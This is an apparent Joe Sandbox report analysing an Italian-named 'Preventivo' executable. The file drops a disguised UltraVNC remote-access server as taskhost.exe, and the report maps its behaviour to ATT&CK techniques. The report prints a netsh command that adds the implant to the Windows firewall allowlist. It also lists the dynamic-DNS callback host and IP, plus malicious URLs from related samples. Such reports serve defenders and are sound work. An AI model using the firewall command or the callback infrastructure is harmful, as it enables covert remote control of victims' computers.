Source: C:\Users\user\Desktop\Preventivo24.01.11.exeCode function: 0_2_00FB9280 GetCurrentProcess,OpenProcessToken,GetLastError,GetTokenInformation,GetLastError,GetTokenInformation,AllocateAndInitializeSid,EqualSid,FreeSid,GetLastError,FindCloseChangeNotification,0_2_00FB9280
Source: Preventivo24.01.11.exe, 00000000.00000003.1686217786.000000000B0D5000.00000004.00001000.00020000.00000000.sdmp, taskhost.exe, 00000029.00000002.3495148727.000000000022C000.00000002.00000001.01000000.0000000D.sdmp, taskhost.exe.0.drBinary or memory string: Program Manager
Source: Preventivo24.01.11.exe, 00000000.00000003.1686217786.000000000B0D5000.00000004.00001000.00020000.00000000.sdmp, taskhost.exe, taskhost.exe, 00000029.00000002.3495148727.000000000022C000.00000002.00000001.01000000.0000000D.sdmp, taskhost.exe.0.drBinary or memory string: Shell_TrayWnd
Source: Preventivo24.01.11.exe, 00000000.00000003.1686217786.000000000B0D5000.00000004.00001000.00020000.00000000.sdmp, taskhost.exe, 00000029.00000002.3495148727.000000000022C000.00000002.00000001.01000000.0000000D.sdmp, taskhost.exe.0.drBinary or memory string: Progman
Source: Preventivo24.01.11.exe, 00000000.00000003.1686217786.000000000B0D5000.00000004.00001000.00020000.00000000.sdmp, taskhost.exe, 00000029.00000002.3495148727.000000000022C000.00000002.00000001.01000000.0000000D.sdmp, taskhost.exe.0.drBinary or memory string: UltraVNC.ini -settingshelperShell_TrayWnd%dpasswdUltraVNCpasswd2isWritablePermissions{34F673E0-878F-11D5-B98A-00B0D07B8C7C}
Source: taskhost.exe.0.drBinary or memory string: Program ManagerProgmanSHELLDLL_DefViewFolderViewSysListView32BlockInputtimerscreenupdatemouseupdateuser1user2quitplaceholder1placeholder2restartvncDesktop::~vncDesktop : ~vncDesktop
Source: C:\Games\viewer.exeCode function: 6_2_00635448 cpuid 6_2_00635448
Source: C:\Users\user\Desktop\Preventivo24.01.11.exeCode function: GetLocaleInfoW,GetLocaleInfoW,0_2_00FEB480
Source: C:\Games\viewer.exeCode function: GetLocaleInfoW,6_2_0064F04D
Source: C:\Games\viewer.exeCode function: GetLocaleInfoW,GetLocaleInfoW,GetACP,6_2_0064F173
Source: C:\Games\viewer.exeCode function: GetLocaleInfoW,6_2_0064F279
Source: C:\Games\viewer.exeCode function: GetUserDefaultLCID,IsValidCodePage,IsValidLocale,GetLocaleInfoW,GetLocaleInfoW,6_2_0064F348
Source: C:\Games\viewer.exeCode function: GetLocaleInfoEx,___wcsnicmp_ascii,6_2_0063433F
Source: C:\Games\viewer.exeCode function: GetLocaleInfoW,6_2_006483B3
Source: C:\Games\viewer.exeCode function: GetLocaleInfoEx,GetLocaleInfoEx,GetLocaleInfoW,6_2_0063440A
Source: C:\Games\viewer.exeCode function: EnumSystemLocalesW,6_2_0064ECD4
Source: C:\Games\viewer.exeCode function: EnumSystemLocalesW,6_2_0064EC89
Source: C:\Games\viewer.exeCode function: EnumSystemLocalesW,6_2_0064ED6F
Source: C:\Games\viewer.exeCode function: GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,6_2_0064EDFA
Source: C:\Games\viewer.exeCode function: EnumSystemLocalesW,6_2_00647E3A
Source: C:\Users\user\Desktop\Preventivo24.01.11.exeQueries volume information: C:\ VolumeInformationJump to behavior
Source: C:\Windows\SysWOW64\msiexec.exeQueries volume information: C:\ VolumeInformationJump to behavior
Source: C:\Windows\SysWOW64\netsh.exeQueries volume information: C:\ VolumeInformation
Source: C:\Windows\SysWOW64\netsh.exeQueries volume information: C:\ VolumeInformation
Source: C:\Games\taskhost.exeQueries volume information: C:\ VolumeInformation
Source: C:\Games\taskhost.exeQueries volume information: C:\ VolumeInformation
Source: C:\Users\user\Desktop\Preventivo24.01.11.exeCode function: 0_2_01003AD0 CreateNamedPipeW,CreateFileW,0_2_01003AD0
Source: C:\Users\user\Desktop\Preventivo24.01.11.exeCode function: 0_2_00FF6820 GetLocalTime,0_2_00FF6820
Source: C:\Users\user\Desktop\Preventivo24.01.11.exeCode function: 0_2_01002440 GetUserNameW,GetLastError,GetUserNameW,GetEnvironmentVariableW,GetEnvironmentVariableW,RegDeleteValueW,RegCloseKey,RegQueryInfoKeyW,RegCloseKey,RegCloseKey,RegDeleteKeyW,RegCloseKey,RegDeleteValueW,RegCloseKey,0_2_01002440
Source: C:\Games\viewer.exeCode function: 6_2_00648AB4 _free,GetTimeZoneInformation,6_2_00648AB4
Source: C:\Users\user\Desktop\Preventivo24.01.11.exeCode function: 0_2_00E87AA0 GetVersionExW,GetVersionExW,IsProcessorFeaturePresent,0_2_00E87AA0

Lowering of HIPS / PFW / Operating System Security Settings

barindex
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\netsh.exe netsh firewall add allowedprogram program="C:\Games\taskhost.exe" name="MyApplication" mode=ENABLE scope=ALL
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\netsh.exe netsh firewall add allowedprogram program="C:\Games\taskhost.exe" name="MyApplication" mode=ENABLE scope=ALL

Remote Access Functionality

barindex
Source: taskhost.exe, 00000029.00000002.3497479719.0000000003A6D000.00000004.00000010.00020000.00000000.sdmpString found in binary or memory: RFB 003.008
Source: taskhost.exe, 00000029.00000002.3496512970.000000000114E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: RFB 003.008
Initial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionExfiltrationCommand and ControlNetwork EffectsRemote Service EffectsImpactResource DevelopmentReconnaissance
1
Spearphishing Link
1
Windows Management Instrumentation
1
DLL Side-Loading
1
Exploitation for Privilege Escalation
21
Disable or Modify Tools
OS Credential Dumping2
System Time Discovery
1
Remote Desktop Protocol
1
Archive Collected Data
Exfiltration Over Other Network Medium3
Ingress Tool Transfer
Exploit SS7 to Redirect Phone Calls/SMSRemotely Wipe Data Without Authorization1
System Shutdown/Reboot
Acquire InfrastructureGather Victim Identity Information
1
Valid Accounts
3
Native API
1
Valid Accounts
1
DLL Side-Loading
1
Deobfuscate/Decode Files or Information
LSASS Memory11
Peripheral Device Discovery
1
Replication Through Removable Media
Data from Removable MediaExfiltration Over Bluetooth11
Encrypted Channel
SIM Card SwapObtain Device Cloud Backups1
Defacement
DomainsCredentials
1
Replication Through Removable Media
112
Command and Scripting Interpreter
1
Bootkit
1
Valid Accounts
2
Obfuscated Files or Information
Security Account Manager1
Account Discovery
SMB/Windows Admin SharesData from Network Shared DriveAutomated Exfiltration1
Non-Standard Port
Data Encrypted for ImpactDNS ServerEmail Addresses
Local AccountsCronLogin Hook1
Access Token Manipulation
1
Timestomp
NTDS5
File and Directory Discovery
Distributed Component Object ModelInput CaptureTraffic Duplication1
Remote Access Software
Data DestructionVirtual Private ServerEmployee Names
Cloud AccountsLaunchdNetwork Logon Script13
Process Injection
1
DLL Side-Loading
LSA Secrets37
System Information Discovery
SSHKeyloggingScheduled Transfer3
Non-Application Layer Protocol
Data Encrypted for ImpactServerGather Victim Network Information
Replication Through Removable MediaScheduled TaskRC ScriptsRC Scripts1
Masquerading
Cached Domain Credentials1
Query Registry
VNCGUI Input CaptureData Transfer Size Limits14
Application Layer Protocol
Service StopBotnetDomain Properties
External Remote ServicesSystemd TimersStartup ItemsStartup Items1
Valid Accounts
DCSync41
Security Software Discovery
Windows Remote ManagementWeb Portal CaptureExfiltration Over C2 ChannelCommonly Used PortInhibit System RecoveryWeb ServicesDNS
Drive-by CompromiseContainer Orchestration JobScheduled Task/JobScheduled Task/Job1
Modify Registry
Proc Filesystem1
Virtualization/Sandbox Evasion
Cloud ServicesCredential API HookingExfiltration Over Alternative ProtocolApplication Layer ProtocolDefacementServerlessNetwork Trust Dependencies
Exploit Public-Facing ApplicationCommand and Scripting InterpreterAtAt1
Virtualization/Sandbox Evasion
/etc/passwd and /etc/shadow3
Process Discovery
Direct Cloud VM ConnectionsData StagedExfiltration Over Symmetric Encrypted Non-C2 ProtocolWeb ProtocolsInternal DefacementMalvertisingNetwork Topology
Supply Chain CompromisePowerShellCronCron1
Access Token Manipulation
Network Sniffing1
Application Window Discovery
Shared WebrootLocal Data StagingExfiltration Over Asymmetric Encrypted Non-C2 ProtocolFile Transfer ProtocolsExternal DefacementCompromise InfrastructureIP Addresses
Compromise Software Dependencies and Development ToolsAppleScriptLaunchdLaunchd13
Process Injection
Input Capture1
System Owner/User Discovery
Software Deployment ToolsRemote Data StagingExfiltration Over Unencrypted Non-C2 ProtocolMail ProtocolsFirmware CorruptionDomainsNetwork Security Appliances
Compromise Software Supply ChainWindows Command ShellScheduled TaskScheduled Task1
Bootkit
KeyloggingProcess DiscoveryTaint Shared ContentScreen CaptureExfiltration Over Physical MediumDNSResource HijackingDNS ServerGather Victim Org Information
Hide Legend

Legend:

  • Process
  • Signature
  • Created File
  • DNS/IP Info
  • Is Dropped
  • Is Windows Process
  • Number of created Registry Values
  • Number of created Files
  • Visual Basic
  • Delphi
  • Java
  • .Net C# or VB.NET
  • C, C++ or other language
  • Is malicious
  • Internet
behaviorgraph top1 dnsIp2 2 Behavior Graph ID: 1379424 Sample: Preventivo24.01.11.exe Startdate: 23/01/2024 Architecture: WINDOWS Score: 76 87 www.example.com 2->87 89 vnvariant2024.ddnsfree.com 2->89 103 Snort IDS alert for network traffic 2->103 105 Multi AV Scanner detection for submitted file 2->105 13 viewer.exe 1 2->13         started        15 Preventivo24.01.11.exe 73 2->15         started        signatures3 process4 dnsIp5 19 cmd.exe 3 3 13->19         started        95 www.example.com 93.184.216.34, 49729, 80 EDGECASTUS European Union 15->95 79 C:\Users\user\AppData\...\vnchooks.dll, PE32 15->79 dropped 81 C:\Users\user\AppData\Roaming\...\viewer.exe, PE32 15->81 dropped 83 C:\Users\user\AppData\...\taskhost.exe, PE32 15->83 dropped 85 6 other files (none is malicious) 15->85 dropped 22 msiexec.exe 2 15->22         started        file6 process7 signatures8 107 Uses cmd line tools excessively to alter registry or file data 19->107 109 Uses netsh to modify the Windows network and firewall settings 19->109 111 Modifies the windows firewall 19->111 24 viewer.exe 1 19->24         started        26 cmd.exe 1 19->26         started        29 Acrobat.exe 8 74 19->29         started        31 11 other processes 19->31 process9 signatures10 33 cmd.exe 24->33         started        119 Uses cmd line tools excessively to alter registry or file data 26->119 36 reg.exe 1 26->36         started        38 AcroCEF.exe 29->38         started        process11 signatures12 101 Uses cmd line tools excessively to alter registry or file data 33->101 40 cmd.exe 33->40         started        42 viewer.exe 33->42         started        44 cmd.exe 33->44         started        50 10 other processes 33->50 47 AcroCEF.exe 38->47         started        process13 dnsIp14 52 taskhost.exe 40->52         started        56 mode.com 40->56         started        58 netsh.exe 40->58         started        66 3 other processes 40->66 60 cmd.exe 42->60         started        121 Uses cmd line tools excessively to alter registry or file data 44->121 62 reg.exe 44->62         started        97 52.202.204.11, 443, 49738, 49740 AMAZON-AESUS United States 47->97 99 23.54.200.159, 443, 49747 AKAMAI-ASUS United States 47->99 64 cmd.exe 50->64         started        signatures15 process16 dnsIp17 91 vnvariant2024.ddnsfree.com 140.228.29.110, 49749, 5500 OARNET-ASUS United States 52->91 93 127.0.0.1 unknown unknown 52->93 115 Contains functionalty to change the wallpaper 52->115 117 Contains VNC / remote desktop functionality (version string found) 52->117 68 cmd.exe 60->68         started        71 conhost.exe 60->71         started        73 cmd.exe 60->73         started        75 conhost.exe 64->75         started        signatures18 process19 signatures20 113 Uses cmd line tools excessively to alter registry or file data 68->113 77 reg.exe 68->77         started        process21

This section contains all screenshots as thumbnails, including those not shown in the slideshow.


windows-stand
SourceDetectionScannerLabelLink
Preventivo24.01.11.exe8%ReversingLabs
Preventivo24.01.11.exe17%VirustotalBrowse
SourceDetectionScannerLabelLink
C:\Users\user\AppData\Local\Temp\MSI6F00.tmp0%ReversingLabs
C:\Users\user\AppData\Local\Temp\MSI6FDC.tmp0%ReversingLabs
C:\Users\user\AppData\Local\Temp\MSI6FFC.tmp0%ReversingLabs
C:\Users\user\AppData\Local\Temp\shi6E82.tmp0%ReversingLabs
C:\Users\user\AppData\Roaming\Photo and Fax Vn\Photo and vn 1.1.2\install\F97891C\WindowsVolume\Games\UVncVirtualDisplay\UVncVirtualDisplay.dll0%ReversingLabs
C:\Users\user\AppData\Roaming\Photo and Fax Vn\Photo and vn 1.1.2\install\F97891C\WindowsVolume\Games\ddengine.dll0%ReversingLabs
C:\Users\user\AppData\Roaming\Photo and Fax Vn\Photo and vn 1.1.2\install\F97891C\WindowsVolume\Games\taskhost.exe8%ReversingLabs
C:\Users\user\AppData\Roaming\Photo and Fax Vn\Photo and vn 1.1.2\install\F97891C\WindowsVolume\Games\viewer.exe0%ReversingLabs
C:\Users\user\AppData\Roaming\Photo and Fax Vn\Photo and vn 1.1.2\install\F97891C\WindowsVolume\Games\vnchooks.dll0%ReversingLabs
No Antivirus matches
No Antivirus matches
SourceDetectionScannerLabelLink
https://sectigo.com/CPS00%URL Reputationsafe
http://crl.sectigo.com/SectigoPublicCodeSigningRootR46.crl00%URL Reputationsafe
http://ocsp.sectigo.com00%URL Reputationsafe
http://ocsp.thawte.com00%URL Reputationsafe
http://crt.sectigo.com/SectigoPublicCodeSigningCAR36.crt0#0%URL Reputationsafe
http://crt.sectigo.com/SectigoPublicCodeSigningRootR46.p7c0#0%URL Reputationsafe
http://crl.sectigo.com/SectigoRSATimeStampingCA.crl0t0%URL Reputationsafe
http://crl.sectigo.com/SectigoPublicCodeSigningCAR36.crl0y0%URL Reputationsafe
http://crt.sectigo.com/SectigoRSATimeStampingCA.crt0#0%URL Reputationsafe
https://forum.uvnc.comvncMenu::WndProc0%Avira URL Cloudsafe
http://html4/loose.dtd0%Avira URL Cloudsafe
https://www.uvnc.comhttps://forum.uvnc.comnet0%Avira URL Cloudsafe
http://.jpg0%Avira URL Cloudsafe
http://.css0%Avira URL Cloudsafe
https://www.uvnc.comcmd0%Avira URL Cloudsafe
http://java.sun.com/products/plugin/index.html#download0%Avira URL Cloudsafe
http://java.sun.com/update/1.4.2/jinstall-1_4-windows-i586.cab#Version=10%Avira URL Cloudsafe
NameIPActiveMaliciousAntivirus DetectionReputation
www.example.com
93.184.216.34
truefalse
    high
    vnvariant2024.ddnsfree.com
    140.228.29.110
    truefalse
      unknown
      NameMaliciousAntivirus DetectionReputation
      http://www.example.com/download/updates.txtfalse
        high
        NameSourceMaliciousAntivirus DetectionReputation
        http://html4/loose.dtdshi6E82.tmp.0.drfalse
        • Avira URL Cloud: safe
        low
        http://java.sun.com/update/1.4.2/jinstall-1_4-windows-i586.cab#Version=1Preventivo24.01.11.exe, 00000000.00000003.1686217786.000000000B0A6000.00000004.00001000.00020000.00000000.sdmp, taskhost.exe, 00000029.00000000.1860708223.0000000000203000.00000002.00000001.01000000.0000000D.sdmp, taskhost.exe.0.drfalse
        • Avira URL Cloud: safe
        unknown
        https://sectigo.com/CPS0Preventivo24.01.11.exe, 00000000.00000003.1686217786.000000000B1BA000.00000004.00001000.00020000.00000000.sdmp, taskhost.exe.0.drfalse
        • URL Reputation: safe
        unknown
        http://crl.sectigo.com/SectigoPublicCodeSigningRootR46.crl0Preventivo24.01.11.exe, 00000000.00000003.1686217786.000000000B1BA000.00000004.00001000.00020000.00000000.sdmp, taskhost.exe.0.drfalse
        • URL Reputation: safe
        unknown
        http://ocsp.sectigo.com0Preventivo24.01.11.exe, 00000000.00000003.1686217786.000000000B1BA000.00000004.00001000.00020000.00000000.sdmp, taskhost.exe.0.drfalse
        • URL Reputation: safe
        unknown
        http://ocsp.thawte.com0Preventivo24.01.11.exe, 00000000.00000003.1686217786.000000000B1BA000.00000004.00001000.00020000.00000000.sdmp, uvncvirtualdisplay.cat.0.dr, UVncVirtualDisplay.dll.0.drfalse
        • URL Reputation: safe
        unknown
        http://www.pdf-tools.comPreventivo24.01.11.exe, 00000000.00000003.1686217786.000000000AE50000.00000004.00001000.00020000.00000000.sdmp, ~.pdf.0.drfalse
          high
          http://crt.sectigo.com/SectigoPublicCodeSigningCAR36.crt0#Preventivo24.01.11.exe, 00000000.00000003.1686217786.000000000B1BA000.00000004.00001000.00020000.00000000.sdmp, taskhost.exe.0.drfalse
          • URL Reputation: safe
          unknown
          https://www.uvnc.comtaskhost.exe.0.drfalse
            high
            http://crt.sectigo.com/SectigoPublicCodeSigningRootR46.p7c0#Preventivo24.01.11.exe, 00000000.00000003.1686217786.000000000B1BA000.00000004.00001000.00020000.00000000.sdmp, taskhost.exe.0.drfalse
            • URL Reputation: safe
            unknown
            http://.cssshi6E82.tmp.0.drfalse
            • Avira URL Cloud: safe
            low
            http://crl.sectigo.com/SectigoRSATimeStampingCA.crl0tPreventivo24.01.11.exe, 00000000.00000003.1686217786.000000000B1BA000.00000004.00001000.00020000.00000000.sdmp, taskhost.exe.0.drfalse
            • URL Reputation: safe
            unknown
            https://forum.uvnc.comtaskhost.exe.0.drfalse
              high
              https://www.uvnc.comcmdPreventivo24.01.11.exe, 00000000.00000003.1686217786.000000000B0D5000.00000004.00001000.00020000.00000000.sdmp, taskhost.exe, 00000029.00000002.3495148727.000000000022C000.00000002.00000001.01000000.0000000D.sdmp, taskhost.exe.0.drfalse
              • Avira URL Cloud: safe
              unknown
              http://crl.sectigo.com/SectigoPublicCodeSigningCAR36.crl0yPreventivo24.01.11.exe, 00000000.00000003.1686217786.000000000B1BA000.00000004.00001000.00020000.00000000.sdmp, taskhost.exe.0.drfalse
              • URL Reputation: safe
              unknown
              http://crl.thawte.com/ThawteTimestampingCA.crl0Preventivo24.01.11.exe, 00000000.00000003.1686217786.000000000B1BA000.00000004.00001000.00020000.00000000.sdmp, uvncvirtualdisplay.cat.0.dr, UVncVirtualDisplay.dll.0.drfalse
                high
                https://www.thawte.com/cps0/Preventivo24.01.11.exe, 00000000.00000003.1686217786.000000000B1BA000.00000004.00001000.00020000.00000000.sdmp, Preventivo24.01.11.exe, 00000000.00000003.1686217786.000000000AE50000.00000004.00001000.00020000.00000000.sdmp, viewer.exe.0.dr, powercfg.msi.0.drfalse
                  high
                  https://forum.uvnc.comvncMenu::WndProcPreventivo24.01.11.exe, 00000000.00000003.1686217786.000000000B0D5000.00000004.00001000.00020000.00000000.sdmp, taskhost.exe, 00000029.00000002.3495148727.000000000022C000.00000002.00000001.01000000.0000000D.sdmp, taskhost.exe.0.drfalse
                  • Avira URL Cloud: safe
                  low
                  http://crt.sectigo.com/SectigoRSATimeStampingCA.crt0#Preventivo24.01.11.exe, 00000000.00000003.1686217786.000000000B1BA000.00000004.00001000.00020000.00000000.sdmp, taskhost.exe.0.drfalse
                  • URL Reputation: safe
                  unknown
                  https://www.thawte.com/repository0WPreventivo24.01.11.exe, 00000000.00000003.1686217786.000000000B1BA000.00000004.00001000.00020000.00000000.sdmp, Preventivo24.01.11.exe, 00000000.00000003.1686217786.000000000AE50000.00000004.00001000.00020000.00000000.sdmp, viewer.exe.0.dr, powercfg.msi.0.drfalse
                    high
                    https://www.advancedinstaller.comPreventivo24.01.11.exe, 00000000.00000003.1686217786.000000000B1BA000.00000004.00001000.00020000.00000000.sdmp, Preventivo24.01.11.exe, 00000000.00000003.1686217786.000000000AE50000.00000004.00001000.00020000.00000000.sdmp, viewer.exe.0.dr, powercfg.msi.0.drfalse
                      high
                      https://www.uvnc.comhttps://forum.uvnc.comnetPreventivo24.01.11.exe, 00000000.00000003.1686217786.000000000B0D5000.00000004.00001000.00020000.00000000.sdmp, taskhost.exe, 00000029.00000002.3495148727.000000000022C000.00000002.00000001.01000000.0000000D.sdmp, taskhost.exe.0.drfalse
                      • Avira URL Cloud: safe
                      unknown
                      http://java.sun.com/products/plugin/index.html#downloadPreventivo24.01.11.exe, 00000000.00000003.1686217786.000000000B0A6000.00000004.00001000.00020000.00000000.sdmp, taskhost.exe, 00000029.00000000.1860708223.0000000000203000.00000002.00000001.01000000.0000000D.sdmp, taskhost.exe.0.drfalse
                      • Avira URL Cloud: safe
                      unknown
                      http://.jpgshi6E82.tmp.0.drfalse
                      • Avira URL Cloud: safe
                      low
                      • No. of IPs < 25%
                      • 25% < No. of IPs < 50%
                      • 50% < No. of IPs < 75%
                      • 75% < No. of IPs
                      IPDomainCountryFlagASNASN NameMalicious
                      52.202.204.11
                      unknownUnited States
                      14618AMAZON-AESUSfalse
                      93.184.216.34
                      www.example.comEuropean Union
                      15133EDGECASTUSfalse
                      23.54.200.159
                      unknownUnited States
                      16625AKAMAI-ASUSfalse
                      140.228.29.110
                      vnvariant2024.ddnsfree.comUnited States
                      600OARNET-ASUSfalse
                      IP
                      127.0.0.1
                      Joe Sandbox version:38.0.0 Ammolite
                      Analysis ID:1379424
                      Start date and time:2024-01-23 12:17:10 +01:00
                      Joe Sandbox product:CloudBasic
                      Overall analysis duration:0h 9m 54s
                      Hypervisor based Inspection enabled:false
                      Report type:full
                      Cookbook file name:default.jbs
                      Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                      Run name:Run with higher sleep bypass
                      Number of analysed new started processes analysed:59
                      Number of new started drivers analysed:0
                      Number of existing processes analysed:0
                      Number of existing drivers analysed:0
                      Number of injected processes analysed:0
                      Technologies:
                      • HCA enabled
                      • EGA enabled
                      • AMSI enabled
                      Analysis Mode:default
                      Analysis stop reason:Timeout
                      Sample name:Preventivo24.01.11.exe
                      Detection:MAL
                      Classification:mal76.rans.troj.evad.winEXE@110/77@8/5
                      EGA Information:
                      • Successful, ratio: 100%
                      HCA Information:
                      • Successful, ratio: 60%
                      • Number of executed functions: 97
                      • Number of non-executed functions: 147
                      Cookbook Comments:
                      • Found application associated with file extension: .exe
                      • Sleeps bigger than 100000000ms are automatically reduced to 1000ms
                      • Exclude process from analysis (whitelisted): MpCmdRun.exe, WMIADAP.exe, SIHClient.exe, conhost.exe, svchost.exe
                      • Excluded IPs from analysis (whitelisted): 72.21.81.240, 23.63.204.182, 172.64.41.3, 162.159.61.3, 23.55.62.18, 23.55.62.67, 23.47.204.60, 23.47.204.78, 23.47.204.62, 23.47.204.51, 23.47.204.71, 23.47.204.8, 23.47.204.33, 23.34.82.78, 23.34.82.70
                      • Excluded domains from analysis (whitelisted): e4578.dscg.akamaiedge.net, chrome.cloudflare-dns.com, fs.microsoft.com, slscr.update.microsoft.com, acroipm2.adobe.com.edgesuite.net, wu.ec.azureedge.net, ctldl.windowsupdate.com, wu-bg-shim.trafficmanager.net, wu.azureedge.net, acroipm2.adobe.com, fe3cr.delivery.mp.microsoft.com, ocsp.digicert.com, ssl-delivery.adobe.com.edgekey.net, a122.dscd.akamai.net, bg.apr-52dd2-0503.edgecastdns.net, cs11.wpc.v0cdn.net, hlb.apr-52dd2-0.edgecastdns.net, geo2.adobe.com
                      • Not all processes where analyzed, report is missing behavior information
                      • Report size exceeded maximum capacity and may have missing behavior information.
                      • Report size exceeded maximum capacity and may have missing disassembly code.
                      • Report size getting too big, too many NtAllocateVirtualMemory calls found.
                      • Report size getting too big, too many NtOpenKeyEx calls found.
                      • Report size getting too big, too many NtProtectVirtualMemory calls found.
                      • Report size getting too big, too many NtQueryValueKey calls found.
                      No simulations
                      MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                      52.202.204.11Lista_de_pedidos-617262-252362.xlsGet hashmaliciousUnknownBrowse
                        m-vergeer.ternair@outlook.com sent you files via sendbig.com.msgGet hashmaliciousUnknownBrowse
                          https://irp.cdn-website.com/8342910d/files/uploaded/28249193458.pdfGet hashmaliciousUnknownBrowse
                            https://5.imimg.com/data5/MY/Rfq/2023/8/331030482/OB/RZ/OQ/132828970/49241002153.pdfGet hashmaliciousUnknownBrowse
                              RFQ_No._8202023.xla.xlsxGet hashmaliciousUnknownBrowse
                                http://img1.wsimg.com/blobby/go/94e1955e-c7d2-4e11-a6ac-7a5ec652d6cd/downloads/90285909290.pdfGet hashmaliciousUnknownBrowse
                                  https://postoffice.adobe.com/po-server/link/redirect?target=eyJhbGciOiJIUzUxMiJ9.eyJ0ZW1wbGF0ZSI6ImNjX2NvbGxhYl9kY3NoYXJpbmdfdmlld19lbWFpbCIsImVtYWlsQWRkcmVzcyI6InRhbmRhcnRzQHNtZWV0cy12ZXJtZWlyLmJlIiwicmVxdWVzdElkIjoiOWIxNGRiNjMtZjM3OS00NzQ1LTQ2N2YtZTY1ODE1NTQ3MDI2IiwibGluayI6Imh0dHBzOi8vYWNyb2JhdC5hZG9iZS5jb20vaWQvdXJuOmFhaWQ6c2M6QVA6NjFjOTAzMTgtYmE3Zi00ZjMzLWI4YTctZDE1YzVmZTY0ZTEzIiwibGFiZWwiOiIxMSIsImxvY2FsZSI6ImVuX1VTIn0.hXL-219EGgku2uepuRe3vRYvtIfcSD4pBn9ML8LmEOaK4iNvI0v6dcYxZMHpuaSyRT1OE2X5xWymmMNRtOwyFQGet hashmaliciousHTMLPhisherBrowse
                                    download.zipGet hashmaliciousHTMLPhisherBrowse
                                      http://1drv.ms/b/s!AghnLzOtLh6Rb_R1ktHOGkIySh8Get hashmaliciousUnknownBrowse
                                        https://1drv.ms/b/s!Arsg2VA8qyWCacPV3ceYePuhVBkGet hashmaliciousUnknownBrowse
                                          93.184.216.34Fatturation110124.exeGet hashmaliciousUnknownBrowse
                                          • www.example.com/download/updates.txt
                                          Fatturation110124.exeGet hashmaliciousUnknownBrowse
                                          • www.example.com/download/updates.txt
                                          1tuL3R5svT.exeGet hashmaliciousUnknownBrowse
                                          • www.example.com/download/updates.txt
                                          1tuL3R5svT.exeGet hashmaliciousUnknownBrowse
                                          • www.example.com/download/updates.txt
                                          invoice.exeGet hashmaliciousUnknownBrowse
                                          • example.com/invoice.png
                                          invoice.exeGet hashmaliciousUnknownBrowse
                                          • example.com/invoice.png
                                          sPQFAZC1qu.exeGet hashmaliciousUnknownBrowse
                                          • example.com/logo.png
                                          https://swailemmarket.com/09/me.php/?email=mkpublicitarioGet hashmaliciousPhisherBrowse
                                          • example.com/favicon.ico
                                          PO#300637600010.pdf.exeGet hashmaliciousUnknownBrowse
                                          • example.com/Cpxrobfbi.bmp
                                          23.54.200.1590IY4t0eqn2.exeGet hashmaliciousDarkTortilla, RedLineBrowse
                                            python.exeGet hashmaliciousCobaltStrikeBrowse
                                              Fatturation110124.exeGet hashmaliciousUnknownBrowse
                                                140.228.29.110Fatturation110124.exeGet hashmaliciousUnknownBrowse
                                                  Fatturation110124.exeGet hashmaliciousUnknownBrowse
                                                    MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                    www.example.comFatturation110124.exeGet hashmaliciousUnknownBrowse
                                                    • 93.184.216.34
                                                    Fatturation110124.exeGet hashmaliciousUnknownBrowse
                                                    • 93.184.216.34
                                                    http://89.190.156.10/w.shGet hashmaliciousUnknownBrowse
                                                    • 93.184.216.34
                                                    1tuL3R5svT.exeGet hashmaliciousUnknownBrowse
                                                    • 93.184.216.34
                                                    1tuL3R5svT.exeGet hashmaliciousUnknownBrowse
                                                    • 93.184.216.34
                                                    http://93.123.85.79/fuckjewishpeople.x86Get hashmaliciousGafgyt, MiraiBrowse
                                                    • 93.184.216.34
                                                    http://84.54.51.74/SBIDIOT/x86Get hashmaliciousUnknownBrowse
                                                    • 93.184.216.34
                                                    http://45.95.147.236/download/redtail.x86_64Get hashmaliciousUnknownBrowse
                                                    • 93.184.216.34
                                                    http://114.67.217.170/bins/sora.x86Get hashmaliciousUnknownBrowse
                                                    • 93.184.216.34
                                                    MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                    EDGECASTUShttps://spectrumpaint.atlassian.net/wiki/external/ZTZiNjUxYzcwM2FjNGI0OGE1NWMwMzVkMmYwMDBlYmMGet hashmaliciousHTMLPhisherBrowse
                                                    • 152.199.4.44
                                                    https://r20.rs6.net/tn.jsp?f=001YH-7ZZwZf7vdTuy8dA-Lrgcj-RWTq3YSoVohjMwglnhROJ-nqA7TO7-KdBpZBl6RaLh5o0DSlL3SoDP7qpv4LsjHVxt3Zzvw1KN163kNMN-iXLg07xWzu4hMlToFknIyjffPrubFycvA3YBCe7UEIw==&c=Yks7_GJ0450wjzHe24SAzoXRzl2-u4T4FpfxJamuYFeWFIrqepMI7Q==&ch=WTLp04fpQb3-V9z92yhgE0Y-Y6wimMaEQRH3SzFk5jbBN1xPF_QeGA==Get hashmaliciousUnknownBrowse
                                                    • 72.21.91.66
                                                    https://bafkreihnbfu4b55y5i6veo6i34vpad7c6uzbf5dqnxud5e2udieuscrgnm.ipfs.cf-ipfs.com/Get hashmaliciousHTMLPhisherBrowse
                                                    • 152.199.4.44
                                                    https://bmwag-rt-prod2-t.campaign.adobe.com/r/?id=h2ccc12b%2C8d23fb3%2C492093b&p1=//ammuchee.com/info/tech/qwertyshshdjdjdjdncnchdjdeieujdjdndncmvnvnbdsjksjhdheyjdndncmcncnc/sjsksjdjdhdncnchdheyeudjdkdkdmcmcckdjgsgshdbdndjcndnjdjdjssbcnchdhsj/ilqlhsjblifgnsbvfzktoqmecnhlsygugqcuuisqkcdfbuejzvhnfndkiqoxmujypeooogotvvcaotxduopphebsnahcpgqmnjfk/#.zfsnx.bWFsZ29yemF0YS56dXJla0BEZWVaZWUucGw=Get hashmaliciousHTMLPhisherBrowse
                                                    • 152.199.4.44
